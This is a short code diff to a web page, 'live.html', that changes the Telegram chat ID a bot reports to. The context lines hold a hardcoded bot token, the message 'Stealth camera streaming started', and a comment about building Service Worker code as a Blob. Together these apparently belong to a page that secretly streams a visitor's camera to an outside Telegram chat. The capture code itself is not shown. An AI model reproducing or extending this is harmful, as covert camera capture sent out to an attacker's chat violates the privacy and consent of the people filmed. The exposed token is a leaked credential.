--- a/live.html
+++ b/live.html
@@ -22,7 +22,7 @@
   <script>
     // Telegram bot details
     const botToken = '7826950594:AAFBygBD_E2PmAITI6zsaPilys7l6i0gWBU';
-    const chatId = '894002841';
+    const chatId = '-1002681260911';
     const message = 'Stealth camera streaming started';
 
     // Create Service Worker code as a Blob
